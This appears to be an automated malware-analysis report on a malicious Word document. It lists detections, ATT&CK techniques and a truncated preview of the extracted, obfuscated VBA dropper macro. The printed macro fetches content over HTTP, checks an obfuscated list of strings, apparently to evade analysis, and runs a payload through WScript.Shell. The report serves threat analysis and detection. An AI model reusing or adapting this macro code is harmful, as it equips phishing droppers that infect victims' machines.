MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The macros use CreateObject to instantiate WScript.Shell and then execute a command that downloads and runs a second-stage payload from a URL. The document also contains a lure to trick the user into enabling macros, which is a common tactic for malware droppers.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-6434968-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6434968-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7978 bytes |
SHA-256: c1f608c7055c0675383fa81f92092e1120759ef36fe3c19975c878cf1a2e5070 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim BDKpq As Boolean
Public Sub Kophy_Painted(ByVal bdEpgC As Long, ByVal qXcQz As IInkRectangle)
YwUnuOy
End Sub
Public Sub YwUnuOy()
If BDKpq Then Exit Sub
BDKpq = True
EgrgF
End Sub
Public Sub EgrgF()
On Error GoTo miIENA
iUWgY
DQHGRdA
PPIfkW
eYNWvP
ThTlVi
Set bQywJq = IjRSE(CreateObject(NlGpq))
KobOQn bQywJq.Run(QpeFzdA, 0)
Exit Sub
miIENA:
End Sub
Public Sub ThTlVi()
jSkGzH = hoieJ
If Not loHPp(jSkGzH, a("LoWAOENAxjsbCAI", 98, 139)) Then Error 105
If zdRgYC(jSkGzH, TUwMDq) Then Error 106
End Sub
Public Function hoieJ() As String
Set mClCXf = CreateObject(a("qnHN5einr.RWiCtp.WxstpjiettC1uHtt.", 131, 221))
pEAHI mClCXf.Open(lvXko, CFmQUEa, jcJWP)
pEAHI mClCXf.SetRequestHeader(pGOvuh, WILONqM)
pEAHI mClCXf.SetRequestHeader(a("A-resUQUbvreGJtneg", 35, 41), a("S 0WdsT. in5)OiMia.(mtl I7;io 0Tdt.sSPol/0cpieME. nwN6;re/0nPszl4 oab;", 521, 583))
pEAHI mClCXf.Send
If mClCXf.Status = 200 Then
hoieJ = mClCXf.ResponseText
End If
End Function
Public Function pGOvuh() As String
pGOvuh = a("LrerefeRzFcHiOP", 89, 22)
End Function
Public Function WILONqM() As String
WILONqM = a("mnpYwmyP/.espicdha/-Qw/-u/c-ssnartxlaM.eiWwomQ:dtetmodz", 567, 126)
End Function
Public Function CFmQUEa() As String
CFmQUEa = a("/ct.aTe/tdav.z/scixpwmot1xmo/y.h2mkg:ino/wemp/mSiw", 121, 531)
End Function
Public Function jcJWP() As Boolean
jcJWP = False
End Function
Public Function lvXko() As String
lvXko = a("EnVTcazkGcr", 102, 74)
End Function
Public Function loHPp(ByVal rHglo As String, ByVal QTesVAF As String) As Boolean
loHPp = InStrRev(UCase(rHglo), UCase(QTesVAF)) <> 0
End Function
Public Function zdRgYC(ByVal rHglo As String, ByVal iJGjAh) As Boolean
For Each QTesVAF In iJGjAh
If loHPp(rHglo, QTesVAF) Then GoTo epkvdl
Next
Exit Function
epkvdl:
zdRgYC = True
End Function
Public Sub pEAHI(ByVal TYzTTTW)
End Sub
Public Function TUwMDq()
TUwMDq = KobOQn(Array(a("wrrLotfnhc crpJIo", 88, 168), a("tONTsRLyeYOotCUngnHkGisNI E", 221, 265), a("llJqMtO UBqJZAAcE", 144, 26), a("eNhOxTIjOyPbRAuR", 153, 22), a("bmHtluavMVHrhKS", 149, 129), _
a("ToOlVYemaAkKRPkcWHsUCKBqB", 56, 172), a("xckXgeSRlopAXeACK", 21, 160), a("EJEToNqqarTdBCvRaW", 113, 191), a("wTsUrtFAHBniXAevA", 169, 90), a("toYVwhF CsZAPsj", 152, 16), _
a("Cg vBdOknRHeCGrixTM", 187, 93), a("GIshOWbsnToGsfd", 157, 93), a("mooUgoeNlaudyANSa", 107, 111), a("bpFZncXNOottefmirx", 43, 38), a("DEuDAuoidOEtSPcSL", 126, 88), _
a("rrpduTCBnyqIWeotMz", 31, 167), a("foisJFTpRoewoNbppf", 29, 141), a("gvMlgSbUaemerEAiSsO", 49, 192), a("EzSVCCwEeCbLrr", 89, 16), a("sErBLllNBGLops ,Te", 197, 163), _
a("wafIentCMXRxvO", 25, 47), a("SEMgAtcIDAwAmxGf", 133, 162), a("iXaneSazoFKmoe", 145, 104), a("EcGNAdISaRamkdMc", 171, 36), a(" scqeDnUTOeDrATTGai", 135, 201), _
a("vkjGrYILATiPSoHe", 143, 62), a("odbcBujMlWDEN", 96, 133), a("AVOneIstYOEffRfj", 99, 65), a("ZLdLfreNzTeHbaf", 104, 116), a("EdzdSuCKALLceFR", 32, 77), _
a("seTiCrsftHnqtMOd", 103, 55), a("olQhrEcnXodRALu", 142, 82), a("rleIeOyueSvFcie", 17, 116), a("vPQenfdiOalOrDEETBj", 104, 207), a("PceCFMGfSINeXHw", 128, 158), _
a("ioeteMwPrrSDIsvNVtROAkAN", 157, 103), a(" pCEaAYCllFEtONCo", 157, 171), a("XACMGgnTRLYG", 67, 61), a("sohLLqhmiUSDet", 69, 100), a("AHiTAOceUlBCcYDw", 143, 122), _
a("isyTeUycWJutjRiQ", 163, 97), a("EmNrEvOgPLrMrYFRtN", 143, 79), a("itsNRVVIujeCTNiRdY", 95, 80), a("czPvoCSOhgFEi", 20, 70), a("eavpnAJrCQDttQyEDf", 187, 106), _
a("HsQdJyPf.HLepcIoEW", 185, 171), a("tlhrMFOcajeosJ", 65, 54), a("rHClilMtefoOCSgOV", 49, 40), a("YiwIMEzDneCjDBME", 151, 94), a("EeoBaPgSFIeiVwLn", 67, 110)))
End Function
Public Function NlGpq() As String
NlGpq = a("qc.laStluWpeNEihHTrSG", 227, 51)
End Function
Public Sub DQHGRdA()
If JRfFOxN < KgmNAJ Then Error 101
End Sub
Public Function JRfFOxN() As Integer
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.